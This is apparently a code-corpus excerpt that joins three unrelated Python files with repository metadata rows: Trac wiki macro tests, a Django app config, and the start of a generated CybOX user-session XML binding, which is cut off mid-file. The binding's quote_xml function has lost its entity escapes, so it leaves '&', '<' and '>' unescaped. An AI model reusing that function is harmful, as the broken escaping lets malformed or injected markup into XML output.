[[TitleIndex(format=hierarchy,min=5)]]
------------------------------
<p>
</p><div class="titleindex"><ul><li><a href="/wiki/TracDev">TracDev</a><ul><li><a href="/wiki/TracDev/ApiChanges">ApiChanges</a></li><li><a href="/wiki/TracDev/ApiChanges/0.10">ApiChanges/0.10</a></li><li><a href="/wiki/TracDev/ApiChanges/0.11">ApiChanges/0.11</a></li><li><a href="/wiki/TracDev/ApiChanges/0.12">ApiChanges/0.12</a></li><li><a href="/wiki/TracDev/ApiChanges/0.12/Missing/Exists">ApiChanges/0.12/Missing/Exists</a></li></ul></li><li><a href="/wiki/WikiStart">WikiStart</a></li></ul></div><p>
</p>
------------------------------
============================== TitleIndex, group format with complex hierarchy
[[TitleIndex(format=group)]]
------------------------------
<p>
</p><div class="titleindex"><ul><li><strong>TracDev</strong><ul><li><a href="/wiki/TracDev">TracDev</a></li><li><strong>ApiChanges</strong><ul><li><a href="/wiki/TracDev/ApiChanges">TracDev/ApiChanges</a></li><li><a href="/wiki/TracDev/ApiChanges/0.10">TracDev/ApiChanges/0.10</a></li><li><a href="/wiki/TracDev/ApiChanges/0.11">TracDev/ApiChanges/0.11</a></li><li><strong>0.12</strong><ul><li><a href="/wiki/TracDev/ApiChanges/0.12">TracDev/ApiChanges/0.12</a></li><li><a href="/wiki/TracDev/ApiChanges/0.12/Missing/Exists">TracDev/ApiChanges/0.12/Missing/Exists</a></li></ul></li></ul></li></ul></li><li><a href="/wiki/WikiStart">WikiStart</a></li></ul></div><p>
</p>
------------------------------
"""
def titleindex5_setup(tc):
add_pages(tc, [
'TracDev',
'TracDev/ApiChanges',
'TracDev/ApiChanges/0.10',
'TracDev/ApiChanges/0.11',
'TracDev/ApiChanges/0.12',
'TracDev/ApiChanges/0.12/Missing/Exists',
])
RECENTCHANGES_MACRO_TEST_CASES = u""""
============================== RecentChanges, group option
[[RecentChanges()]]
[[RecentChanges(group=date)]]
[[RecentChanges(group=none)]]
[[RecentChanges(,2,group=none)]]
[[RecentChanges(Wiki,group=none)]]
[[RecentChanges(Wiki,1,group=none)]]
------------------------------
<p>
</p><div><h3>%(date)s</h3><ul><li><a href="/wiki/WikiEnd">WikiEnd</a>
</li><li><a href="/wiki/WikiMid">WikiMid</a>
</li><li><a href="/wiki/WikiStart">WikiStart</a>
</li></ul></div><p>
</p><div><h3>%(date)s</h3><ul><li><a href="/wiki/WikiEnd">WikiEnd</a>
</li><li><a href="/wiki/WikiMid">WikiMid</a>
</li><li><a href="/wiki/WikiStart">WikiStart</a>
</li></ul></div><p>
</p><div><ul><li><a href="/wiki/WikiEnd">WikiEnd</a>
</li><li><a href="/wiki/WikiMid">WikiMid</a>
</li><li><a href="/wiki/WikiStart">WikiStart</a>
</li></ul></div><p>
</p><div><ul><li><a href="/wiki/WikiEnd">WikiEnd</a>
</li><li><a href="/wiki/WikiMid">WikiMid</a>
</li></ul></div><p>
</p><div><ul><li><a href="/wiki/WikiEnd">WikiEnd</a>
</li><li><a href="/wiki/WikiMid">WikiMid</a>
</li><li><a href="/wiki/WikiStart">WikiStart</a>
</li></ul></div><p>
</p><div><ul><li><a href="/wiki/WikiEnd">WikiEnd</a>
</li></ul></div><p>
</p>
------------------------------
"""
def recentchanges_setup(tc):
def add_pages(tc, names):
for name in names:
now = datetime.now(utc)
w = WikiPage(tc.env)
w.name = name
w.text = '--'
w.save('joe', 'the page ' + name, '::1', now)
add_pages(tc, [
'WikiMid',
'WikiEnd',
])
tc.correct = tc.correct % {'date': format_date(tzinfo=utc,
locale=locale_en)}
def recentchanges_teardown(tc):
tc.env.reset_db()
TRACINI_MACRO_TEST_CASES = u"""\
============================== TracIni, option with empty doc (#10940)
[[TracIni(section-42)]]
------------------------------
<p>
</p><div class="tracini">\
<h3 id="section-42-section"><code>[section-42]</code></h3>\
<table class="wiki"><tbody>\
<tr class="even"><td><code>option1</code></td><td></td><td class="default"><code>value</code></td></tr>\
<tr class="odd"><td><code>option2</code></td><td>blah</td><td class="default"><code>value</code></td></tr>\
</tbody></table>\
</div><p>
</p>
------------------------------
============================== TracIni, list option with sep=| (#11074)
[[TracIni(section-list)]]
------------------------------
<p>
</p><div class="tracini">\
<h3 id="section-list-section"><code>[section-list]</code></h3>\
<table class="wiki"><tbody>\
<tr class="even"><td><code>option1</code></td><td></td><td class="default"><code>4.2|42|42||0|enabled</code></td></tr>\
</tbody></table>\
</div><p>
</p>
------------------------------
============================== TracIni, option with "false" value as default
[[TracIni(section-def)]]
------------------------------
<p>
</p><div class="tracini">\
<h3 id="section-def-section"><code>[section-def]</code></h3>\
<table class="wiki"><tbody>\
<tr class="even"><td><code>option1</code></td><td></td><td class="nodefault">(no default)</td></tr>\
<tr class="odd"><td><code>option2</code></td><td></td><td class="nodefault">(no default)</td></tr>\
<tr class="even"><td><code>option3</code></td><td></td><td class="default"><code>0</code></td></tr>\
<tr class="odd"><td><code>option4</code></td><td></td><td class="default"><code>disabled</code></td></tr>\
<tr class="even"><td><code>option5</code></td><td></td><td class="nodefault">(no default)</td></tr>\
</tbody></table>\
</div><p>
</p>
------------------------------
"""
def tracini_setup(tc):
tc._orig_registry = Option.registry
class Foo(object):
option_a1 = (Option)('section-42', 'option1', 'value', doc='')
option_a2 = (Option)('section-42', 'option2', 'value', doc='blah')
option_l1 = (ListOption)('section-list', 'option1',
[4.2, '42', 42, None, 0, True], sep='|',
keep_empty=True)
option_d1 = (Option)('section-def', 'option1', None)
option_d2 = (Option)('section-def', 'option2', '')
option_d3 = (IntOption)('section-def', 'option3', 0)
option_d4 = (BoolOption)('section-def', 'option4', False)
option_d5 = (ListOption)('section-def', 'option5', [])
def tracini_teardown(tc):
Option.registry = tc._orig_registry
def suite():
suite = unittest.TestSuite()
suite.addTest(formatter.suite(IMAGE_MACRO_TEST_CASES, file=__file__,
setup=image_setup,
teardown=image_teardown))
suite.addTest(formatter.suite(TITLEINDEX1_MACRO_TEST_CASES, file=__file__))
suite.addTest(formatter.suite(TITLEINDEX2_MACRO_TEST_CASES, file=__file__,
setup=titleindex2_setup,
teardown=titleindex_teardown))
suite.addTest(formatter.suite(TITLEINDEX3_MACRO_TEST_CASES, file=__file__,
setup=titleindex3_setup,
teardown=titleindex_teardown,
context=('wiki', 'WikiStart/Second')))
suite.addTest(formatter.suite(TITLEINDEX4_MACRO_TEST_CASES, file=__file__,
setup=titleindex4_setup,
teardown=titleindex_teardown))
suite.addTest(formatter.suite(TITLEINDEX5_MACRO_TEST_CASES, file=__file__,
setup=titleindex5_setup,
teardown=titleindex_teardown))
suite.addTest(formatter.suite(RECENTCHANGES_MACRO_TEST_CASES, file=__file__,
setup=recentchanges_setup,
teardown=recentchanges_teardown))
suite.addTest(formatter.suite(TRACINI_MACRO_TEST_CASES, file=__file__,
setup=tracini_setup,
teardown=tracini_teardown))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='suite')
| 48.013201 | 991 | 0.568429 |
7b7de9d07345e10819860d65a9073b57359f573c | 102 | py | Python | full_inventory/apps.py | eisnerh/DjangoInventory | 8abf348a26984f5010feb080352cd05f5d3c04ff | [
"Apache-2.0"
] | null | null | null | full_inventory/apps.py | eisnerh/DjangoInventory | 8abf348a26984f5010feb080352cd05f5d3c04ff | [
"Apache-2.0"
] | null | null | null | full_inventory/apps.py | eisnerh/DjangoInventory | 8abf348a26984f5010feb080352cd05f5d3c04ff | [
"Apache-2.0"
] | null | null | null | from django.apps import AppConfig
class FullInventoryConfig(AppConfig):
name = 'full_inventory'
| 17 | 37 | 0.784314 |
5ec02121e571f64193ee14162fe28efbfbb43dbd | 34,890 | py | Python | cybox/bindings/user_session_object.py | siemens/python-cybox | b692a98c8a62bd696e2a0dda802ada7359853482 | [
"BSD-3-Clause"
] | null | null | null | cybox/bindings/user_session_object.py | siemens/python-cybox | b692a98c8a62bd696e2a0dda802ada7359853482 | [
"BSD-3-Clause"
] | null | null | null | cybox/bindings/user_session_object.py | siemens/python-cybox | b692a98c8a62bd696e2a0dda802ada7359853482 | [
"BSD-3-Clause"
] | 1 | 2019-04-16T18:37:32.000Z | 2019-04-16T18:37:32.000Z | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright (c) 2014, The MITRE Corporation. All rights reserved.
# See LICENSE.txt for complete terms.
#
# Generated Tue Apr 09 11:13:56 2013 by generateDS.py version 2.9a.
#
import sys
import getopt
import re as re_
import cybox_common
import base64
from datetime import datetime, tzinfo, timedelta
etree_ = None
Verbose_import_ = False
( XMLParser_import_none, XMLParser_import_lxml,
XMLParser_import_elementtree
) = range(3)
XMLParser_import_library = None
try:
# lxml
from lxml import etree as etree_
XMLParser_import_library = XMLParser_import_lxml
if Verbose_import_:
print("running with lxml.etree")
except ImportError:
try:
# cElementTree from Python 2.5+
import xml.etree.cElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with cElementTree on Python 2.5+")
except ImportError:
try:
# ElementTree from Python 2.5+
import xml.etree.ElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with ElementTree on Python 2.5+")
except ImportError:
try:
# normal cElementTree install
import cElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with cElementTree")
except ImportError:
try:
# normal ElementTree install
import elementtree.ElementTree as etree_
XMLParser_import_library = XMLParser_import_elementtree
if Verbose_import_:
print("running with ElementTree")
except ImportError:
raise ImportError(
"Failed to import ElementTree from any known place")
def parsexml_(*args, **kwargs):
if (XMLParser_import_library == XMLParser_import_lxml and
'parser' not in kwargs):
# Use the lxml ElementTree compatible parser so that, e.g.,
# we ignore comments.
kwargs['parser'] = etree_.ETCompatXMLParser(huge_tree=True)
doc = etree_.parse(*args, **kwargs)
return doc
#
# User methods
#
# Calls to the methods in these classes are generated by generateDS.py.
# You can replace these methods by re-implementing the following class
# in a module named generatedssuper.py.
try:
from generatedssuper import GeneratedsSuper
except ImportError, exp:
class GeneratedsSuper(object):
tzoff_pattern = re_.compile(r'(\+|-)((0\d|1[0-3]):[0-5]\d|14:00)$')
class _FixedOffsetTZ(tzinfo):
def __init__(self, offset, name):
self.__offset = timedelta(minutes = offset)
self.__name = name
def utcoffset(self, dt):
return self.__offset
def tzname(self, dt):
return self.__name
def dst(self, dt):
return None
def gds_format_string(self, input_data, input_name=''):
return input_data
def gds_validate_string(self, input_data, node, input_name=''):
return input_data
def gds_format_base64(self, input_data, input_name=''):
return base64.b64encode(input_data)
def gds_validate_base64(self, input_data, node, input_name=''):
return input_data
def gds_format_integer(self, input_data, input_name=''):
return '%d' % input_data
def gds_validate_integer(self, input_data, node, input_name=''):
return input_data
def gds_format_integer_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_integer_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
try:
fvalue = float(value)
except (TypeError, ValueError), exp:
raise_parse_error(node, 'Requires sequence of integers')
return input_data
def gds_format_float(self, input_data, input_name=''):
return '%f' % input_data
def gds_validate_float(self, input_data, node, input_name=''):
return input_data
def gds_format_float_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_float_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
try:
fvalue = float(value)
except (TypeError, ValueError), exp:
raise_parse_error(node, 'Requires sequence of floats')
return input_data
def gds_format_double(self, input_data, input_name=''):
return '%e' % input_data
def gds_validate_double(self, input_data, node, input_name=''):
return input_data
def gds_format_double_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_double_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
try:
fvalue = float(value)
except (TypeError, ValueError), exp:
raise_parse_error(node, 'Requires sequence of doubles')
return input_data
def gds_format_boolean(self, input_data, input_name=''):
return ('%s' % input_data).lower()
def gds_validate_boolean(self, input_data, node, input_name=''):
return input_data
def gds_format_boolean_list(self, input_data, input_name=''):
return '%s' % input_data
def gds_validate_boolean_list(self, input_data, node, input_name=''):
values = input_data.split()
for value in values:
if value not in ('true', '1', 'false', '0', ):
raise_parse_error(node,
'Requires sequence of booleans '
'("true", "1", "false", "0")')
return input_data
def gds_validate_datetime(self, input_data, node, input_name=''):
return input_data
def gds_format_datetime(self, input_data, input_name=''):
if isinstance(input_data, basestring):
return input_data
if input_data.microsecond == 0:
_svalue = input_data.strftime('%Y-%m-%dT%H:%M:%S')
else:
_svalue = input_data.strftime('%Y-%m-%dT%H:%M:%S.%f')
if input_data.tzinfo is not None:
tzoff = input_data.tzinfo.utcoffset(input_data)
if tzoff is not None:
total_seconds = tzoff.seconds + (86400 * tzoff.days)
if total_seconds == 0:
_svalue += 'Z'
else:
if total_seconds < 0:
_svalue += '-'
total_seconds *= -1
else:
_svalue += '+'
hours = total_seconds // 3600
minutes = (total_seconds - (hours * 3600)) // 60
_svalue += '{0:02d}:{1:02d}'.format(hours, minutes)
return _svalue
def gds_parse_datetime(self, input_data, node, input_name=''):
tz = None
if input_data[-1] == 'Z':
tz = GeneratedsSuper._FixedOffsetTZ(0, 'GMT')
input_data = input_data[:-1]
else:
results = GeneratedsSuper.tzoff_pattern.search(input_data)
if results is not None:
tzoff_parts = results.group(2).split(':')
tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
if results.group(1) == '-':
tzoff *= -1
tz = GeneratedsSuper._FixedOffsetTZ(
tzoff, results.group(0))
input_data = input_data[:-6]
if len(input_data.split('.')) > 1:
dt = datetime.strptime(
input_data, '%Y-%m-%dT%H:%M:%S.%f')
else:
dt = datetime.strptime(
input_data, '%Y-%m-%dT%H:%M:%S')
return dt.replace(tzinfo = tz)
def gds_validate_date(self, input_data, node, input_name=''):
return input_data
def gds_format_date(self, input_data, input_name=''):
if isinstance(input_data, basestring):
return input_data
_svalue = input_data.strftime('%Y-%m-%d')
if input_data.tzinfo is not None:
tzoff = input_data.tzinfo.utcoffset(input_data)
if tzoff is not None:
total_seconds = tzoff.seconds + (86400 * tzoff.days)
if total_seconds == 0:
_svalue += 'Z'
else:
if total_seconds < 0:
_svalue += '-'
total_seconds *= -1
else:
_svalue += '+'
hours = total_seconds // 3600
minutes = (total_seconds - (hours * 3600)) // 60
_svalue += '{0:02d}:{1:02d}'.format(hours, minutes)
return _svalue
def gds_parse_date(self, input_data, node, input_name=''):
tz = None
if input_data[-1] == 'Z':
tz = GeneratedsSuper._FixedOffsetTZ(0, 'GMT')
input_data = input_data[:-1]
else:
results = GeneratedsSuper.tzoff_pattern.search(input_data)
if results is not None:
tzoff_parts = results.group(2).split(':')
tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
if results.group(1) == '-':
tzoff *= -1
tz = GeneratedsSuper._FixedOffsetTZ(
tzoff, results.group(0))
input_data = input_data[:-6]
return datetime.strptime(input_data,
'%Y-%m-%d').replace(tzinfo = tz)
def gds_str_lower(self, instring):
return instring.lower()
def get_path_(self, node):
path_list = []
self.get_path_list_(node, path_list)
path_list.reverse()
path = '/'.join(path_list)
return path
Tag_strip_pattern_ = re_.compile(r'\{.*\}')
def get_path_list_(self, node, path_list):
if node is None:
return
tag = GeneratedsSuper.Tag_strip_pattern_.sub('', node.tag)
if tag:
path_list.append(tag)
self.get_path_list_(node.getparent(), path_list)
def get_class_obj_(self, node, default_class=None):
class_obj1 = default_class
if 'xsi' in node.nsmap:
classname = node.get('{%s}type' % node.nsmap['xsi'])
if classname is not None:
names = classname.split(':')
if len(names) == 2:
classname = names[1]
class_obj2 = globals().get(classname)
if class_obj2 is not None:
class_obj1 = class_obj2
return class_obj1
def gds_build_any(self, node, type_name=None):
return None
#
# If you have installed IPython you can uncomment and use the following.
# IPython is available from http://ipython.scipy.org/.
#
## from IPython.Shell import IPShellEmbed
## args = ''
## ipshell = IPShellEmbed(args,
## banner = 'Dropping into IPython',
## exit_msg = 'Leaving Interpreter, back to program.')
# Then use the following line where and when you want to drop into the
# IPython shell:
# ipshell('<some message> -- Entering ipshell.\nHit Ctrl-D to exit')
#
# Globals
#
ExternalEncoding = 'utf-8'
Tag_pattern_ = re_.compile(r'({.*})?(.*)')
String_cleanup_pat_ = re_.compile(r"[\n\r\s]+")
Namespace_extract_pat_ = re_.compile(r'{(.*)}(.*)')
#
# Support/utility functions.
#
def showIndent(lwrite, level, pretty_print=True):
if pretty_print:
lwrite(' ' * level)
def quote_xml(inStr):
if not inStr:
return ''
s1 = (isinstance(inStr, basestring) and inStr or
'%s' % inStr)
s1 = s1.replace('&', '&')
s1 = s1.replace('<', '<')
s1 = s1.replace('>', '>')
return unicode(s1).encode(ExternalEncoding)
def quote_attrib(inStr):
s1 = (isinstance(inStr, basestring) and inStr or
'%s' % inStr)
    s1 = s1.replace('&', '&amp;')
    s1 = s1.replace('<', '&lt;')
    s1 = s1.replace('>', '&gt;')
if '"' in s1:
if "'" in s1:
s1 = '"%s"' % s1.replace('"', """)
else:
s1 = "'%s'" % s1
else:
s1 = '"%s"' % s1
return unicode(s1).encode(ExternalEncoding)
def quote_python(inStr):
s1 = inStr
if s1.find("'") == -1:
if s1.find('\n') == -1:
return "'%s'" % s1
else:
return "'''%s'''" % s1
else:
if s1.find('"') != -1:
s1 = s1.replace('"', '\\"')
if s1.find('\n') == -1:
return '"%s"' % s1
else:
return '"""%s"""' % s1
def get_all_text_(node):
if node.text is not None:
text = node.text
else:
text = ''
for child in node:
if child.tail is not None:
text += child.tail
return text
def find_attr_value_(attr_name, node):
attrs = node.attrib
attr_parts = attr_name.split(':')
value = None
if len(attr_parts) == 1:
value = attrs.get(attr_name)
elif len(attr_parts) == 2:
prefix, name = attr_parts
namespace = node.nsmap.get(prefix)
if namespace is not None:
value = attrs.get('{%s}%s' % (namespace, name, ))
return value
class GDSParseError(Exception):
pass
def raise_parse_error(node, msg):
if XMLParser_import_library == XMLParser_import_lxml:
msg = '%s (element %s/line %d)' % (
msg, node.tag, node.sourceline, )
else:
msg = '%s (element %s)' % (msg, node.tag, )
raise GDSParseError(msg)
class MixedContainer:
# Constants for category:
CategoryNone = 0
CategoryText = 1
CategorySimple = 2
CategoryComplex = 3
# Constants for content_type:
TypeNone = 0
TypeText = 1
TypeString = 2
TypeInteger = 3
TypeFloat = 4
TypeDecimal = 5
TypeDouble = 6
TypeBoolean = 7
TypeBase64 = 8
def __init__(self, category, content_type, name, value):
self.category = category
self.content_type = content_type
self.name = name
self.value = value
def getCategory(self):
return self.category
def getContenttype(self, content_type):
return self.content_type
def getValue(self):
return self.value
def getName(self):
return self.name
def export(self, lwrite, level, name, namespace, pretty_print=True):
if self.category == MixedContainer.CategoryText:
# Prevent exporting empty content as empty lines.
if self.value.strip():
lwrite(self.value)
elif self.category == MixedContainer.CategorySimple:
self.exportSimple(lwrite, level, name)
else: # category == MixedContainer.CategoryComplex
self.value.export(lwrite, level, namespace, name, pretty_print)
def exportSimple(self, lwrite, level, name):
if self.content_type == MixedContainer.TypeString:
lwrite('<%s>%s</%s>' %
(self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeInteger or \
self.content_type == MixedContainer.TypeBoolean:
lwrite('<%s>%d</%s>' %
(self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeFloat or \
self.content_type == MixedContainer.TypeDecimal:
lwrite('<%s>%f</%s>' %
(self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeDouble:
lwrite('<%s>%g</%s>' %
(self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeBase64:
lwrite('<%s>%s</%s>' %
(self.name, base64.b64encode(self.value), self.name))
def to_etree(self, element):
if self.category == MixedContainer.CategoryText:
# Prevent exporting empty content as empty lines.
if self.value.strip():
if len(element) > 0:
if element[-1].tail is None:
element[-1].tail = self.value
else:
element[-1].tail += self.value
else:
if element.text is None:
element.text = self.value
else:
element.text += self.value
elif self.category == MixedContainer.CategorySimple:
subelement = etree_.SubElement(element, '%s' % self.name)
subelement.text = self.to_etree_simple()
else: # category == MixedContainer.CategoryComplex
self.value.to_etree(element)
def to_etree_simple(self):
if self.content_type == MixedContainer.TypeString:
text = self.value
elif (self.content_type == MixedContainer.TypeInteger or
self.content_type == MixedContainer.TypeBoolean):
text = '%d' % self.value
elif (self.content_type == MixedContainer.TypeFloat or
self.content_type == MixedContainer.TypeDecimal):
text = '%f' % self.value
elif self.content_type == MixedContainer.TypeDouble:
text = '%g' % self.value
elif self.content_type == MixedContainer.TypeBase64:
text = '%s' % base64.b64encode(self.value)
return text
def exportLiteral(self, lwrite, level, name):
if self.category == MixedContainer.CategoryText:
showIndent(lwrite, level)
lwrite('model_.MixedContainer(%d, %d, "%s", "%s"),\n'
% (self.category, self.content_type, self.name, self.value))
elif self.category == MixedContainer.CategorySimple:
showIndent(lwrite, level)
lwrite('model_.MixedContainer(%d, %d, "%s", "%s"),\n'
% (self.category, self.content_type, self.name, self.value))
else: # category == MixedContainer.CategoryComplex
showIndent(lwrite, level)
lwrite('model_.MixedContainer(%d, %d, "%s",\n' % \
(self.category, self.content_type, self.name,))
self.value.exportLiteral(lwrite, level + 1)
showIndent(lwrite, level)
lwrite(')\n')
class MemberSpec_(object):
def __init__(self, name='', data_type='', container=0):
self.name = name
self.data_type = data_type
self.container = container
def set_name(self, name): self.name = name
def get_name(self): return self.name
def set_data_type(self, data_type): self.data_type = data_type
def get_data_type_chain(self): return self.data_type
def get_data_type(self):
if isinstance(self.data_type, list):
if len(self.data_type) > 0:
return self.data_type[-1]
else:
return 'xs:string'
else:
return self.data_type
def set_container(self, container): self.container = container
def get_container(self): return self.container
def _cast(typ, value):
if typ is None or value is None:
return value
return typ(value)
#
# Data representation classes.
#
class UserSessionObjectType(cybox_common.ObjectPropertiesType):
"""The UserSessionObjectType type is intended to characterize user
sessions."""
subclass = None
superclass = cybox_common.ObjectPropertiesType
def __init__(self, object_reference=None, Custom_Properties=None, xsi_type=None, Effective_Group=None, Effective_Group_ID=None, Effective_User=None, Effective_User_ID=None, Login_Time=None, Logout_Time=None):
super(UserSessionObjectType, self).__init__(object_reference, Custom_Properties, xsi_type )
self.Effective_Group = Effective_Group
self.Effective_Group_ID = Effective_Group_ID
self.Effective_User = Effective_User
self.Effective_User_ID = Effective_User_ID
self.Login_Time = Login_Time
self.Logout_Time = Logout_Time
def factory(*args_, **kwargs_):
if UserSessionObjectType.subclass:
return UserSessionObjectType.subclass(*args_, **kwargs_)
else:
return UserSessionObjectType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_Effective_Group(self): return self.Effective_Group
def set_Effective_Group(self, Effective_Group): self.Effective_Group = Effective_Group
def validate_StringObjectPropertyType(self, value):
# Validate type cybox_common.StringObjectPropertyType, a restriction on None.
pass
def get_Effective_Group_ID(self): return self.Effective_Group_ID
def set_Effective_Group_ID(self, Effective_Group_ID): self.Effective_Group_ID = Effective_Group_ID
def get_Effective_User(self): return self.Effective_User
def set_Effective_User(self, Effective_User): self.Effective_User = Effective_User
def get_Effective_User_ID(self): return self.Effective_User_ID
def set_Effective_User_ID(self, Effective_User_ID): self.Effective_User_ID = Effective_User_ID
def get_Login_Time(self): return self.Login_Time
def set_Login_Time(self, Login_Time): self.Login_Time = Login_Time
def validate_DateTimeObjectPropertyType(self, value):
# Validate type cybox_common.DateTimeObjectPropertyType, a restriction on None.
pass
def get_Logout_Time(self): return self.Logout_Time
def set_Logout_Time(self, Logout_Time): self.Logout_Time = Logout_Time
def hasContent_(self):
if (
self.Effective_Group is not None or
self.Effective_Group_ID is not None or
self.Effective_User is not None or
self.Effective_User_ID is not None or
self.Login_Time is not None or
self.Logout_Time is not None or
super(UserSessionObjectType, self).hasContent_()
):
return True
else:
return False
def export(self, lwrite, level, namespace_='UserSessionObj:', name_='UserSessionObjectType', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
showIndent(lwrite, level, pretty_print)
lwrite('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(lwrite, level, already_processed, namespace_, name_='UserSessionObjectType')
if self.hasContent_():
lwrite('>%s' % (eol_, ))
self.exportChildren(lwrite, level + 1, namespace_, name_, pretty_print=pretty_print)
showIndent(lwrite, level, pretty_print)
lwrite('</%s%s>%s' % (namespace_, name_, eol_))
else:
lwrite('/>%s' % (eol_, ))
def exportAttributes(self, lwrite, level, already_processed, namespace_='UserSessionObj:', name_='UserSessionObjectType'):
super(UserSessionObjectType, self).exportAttributes(lwrite, level, already_processed, namespace_, name_='UserSessionObjectType')
def exportChildren(self, lwrite, level, namespace_='UserSessionObj:', name_='UserSessionObjectType', fromsubclass_=False, pretty_print=True):
super(UserSessionObjectType, self).exportChildren(lwrite, level, 'UserSessionObj:', name_, True, pretty_print=pretty_print)
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.Effective_Group is not None:
self.Effective_Group.export(lwrite, level, 'UserSessionObj:', name_='Effective_Group', pretty_print=pretty_print)
if self.Effective_Group_ID is not None:
self.Effective_Group_ID.export(lwrite, level, 'UserSessionObj:', name_='Effective_Group_ID', pretty_print=pretty_print)
if self.Effective_User is not None:
self.Effective_User.export(lwrite, level, 'UserSessionObj:', name_='Effective_User', pretty_print=pretty_print)
if self.Effective_User_ID is not None:
self.Effective_User_ID.export(lwrite, level, 'UserSessionObj:', name_='Effective_User_ID', pretty_print=pretty_print)
if self.Login_Time is not None:
self.Login_Time.export(lwrite, level, 'UserSessionObj:', name_='Login_Time', pretty_print=pretty_print)
if self.Logout_Time is not None:
self.Logout_Time.export(lwrite, level, 'UserSessionObj:', name_='Logout_Time', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
def buildAttributes(self, node, attrs, already_processed):
super(UserSessionObjectType, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Effective_Group':
obj_ = cybox_common.StringObjectPropertyType.factory()
obj_.build(child_)
self.set_Effective_Group(obj_)
elif nodeName_ == 'Effective_Group_ID':
obj_ = cybox_common.StringObjectPropertyType.factory()
obj_.build(child_)
self.set_Effective_Group_ID(obj_)
elif nodeName_ == 'Effective_User':
obj_ = cybox_common.StringObjectPropertyType.factory()
obj_.build(child_)
self.set_Effective_User(obj_)
elif nodeName_ == 'Effective_User_ID':
obj_ = cybox_common.StringObjectPropertyType.factory()
obj_.build(child_)
self.set_Effective_User_ID(obj_)
elif nodeName_ == 'Login_Time':
obj_ = cybox_common.DateTimeObjectPropertyType.factory()
obj_.build(child_)
self.set_Login_Time(obj_)
elif nodeName_ == 'Logout_Time':
obj_ = cybox_common.DateTimeObjectPropertyType.factory()
obj_.build(child_)
self.set_Logout_Time(obj_)
super(UserSessionObjectType, self).buildChildren(child_, node, nodeName_, True)
# end class UserSessionObjectType
GDSClassesMapping = {
'Build_Utility': cybox_common.BuildUtilityType,
'Errors': cybox_common.ErrorsType,
'Search_Distance': cybox_common.IntegerObjectPropertyType,
'Error': cybox_common.ErrorType,
'Certificate_Issuer': cybox_common.StringObjectPropertyType,
'Metadata': cybox_common.MetadataType,
'Hash': cybox_common.HashType,
'Information_Source_Type': cybox_common.ControlledVocabularyStringType,
'Block_Hash_Value': cybox_common.HashValueType,
'Fuzzy_Hash_Structure': cybox_common.FuzzyHashStructureType,
'SubDatum': cybox_common.MetadataType,
'Segment_Hash': cybox_common.HashValueType,
'Digital_Signature': cybox_common.DigitalSignatureInfoType,
'Code_Snippets': cybox_common.CodeSnippetsType,
'Value': cybox_common.StringObjectPropertyType,
'Length': cybox_common.IntegerObjectPropertyType,
'Encoding': cybox_common.ControlledVocabularyStringType,
'Internationalization_Settings': cybox_common.InternationalizationSettingsType,
'Tool_Configuration': cybox_common.ToolConfigurationType,
'Compiler': cybox_common.CompilerType,
'Functions': cybox_common.FunctionsType,
'String_Value': cybox_common.StringObjectPropertyType,
'Build_Utility_Platform_Specification': cybox_common.PlatformSpecificationType,
'Compiler_Informal_Description': cybox_common.CompilerInformalDescriptionType,
'System': cybox_common.ObjectPropertiesType,
'Platform': cybox_common.PlatformSpecificationType,
'Usage_Context_Assumptions': cybox_common.UsageContextAssumptionsType,
'Type': cybox_common.ControlledVocabularyStringType,
'Compilers': cybox_common.CompilersType,
'Tool_Type': cybox_common.ControlledVocabularyStringType,
'String': cybox_common.ExtractedStringType,
'Tool': cybox_common.ToolInformationType,
'Build_Information': cybox_common.BuildInformationType,
'Tool_Hashes': cybox_common.HashListType,
'Login_Time': cybox_common.DateTimeObjectPropertyType,
'Error_Instances': cybox_common.ErrorInstancesType,
'Logout_Time': cybox_common.DateTimeObjectPropertyType,
'Data_Segment': cybox_common.StringObjectPropertyType,
'Certificate_Subject': cybox_common.StringObjectPropertyType,
'Language': cybox_common.StringObjectPropertyType,
'Property': cybox_common.PropertyType,
'Strings': cybox_common.ExtractedStringsType,
'Effective_User_ID': cybox_common.StringObjectPropertyType,
'File_System_Offset': cybox_common.IntegerObjectPropertyType,
'Effective_Group': cybox_common.StringObjectPropertyType,
'Reference_Description': cybox_common.StructuredTextType,
'Code_Snippet': cybox_common.ObjectPropertiesType,
'Configuration_Settings': cybox_common.ConfigurationSettingsType,
'Simple_Hash_Value': cybox_common.SimpleHashValueType,
'Byte_String_Value': cybox_common.HexBinaryObjectPropertyType,
'Instance': cybox_common.ObjectPropertiesType,
'Import': cybox_common.StringObjectPropertyType,
'Identifier': cybox_common.PlatformIdentifierType,
'Tool_Specific_Data': cybox_common.ToolSpecificDataType,
'Execution_Environment': cybox_common.ExecutionEnvironmentType,
'Effective_User': cybox_common.StringObjectPropertyType,
'Dependencies': cybox_common.DependenciesType,
'Offset': cybox_common.IntegerObjectPropertyType,
'Date': cybox_common.DateRangeType,
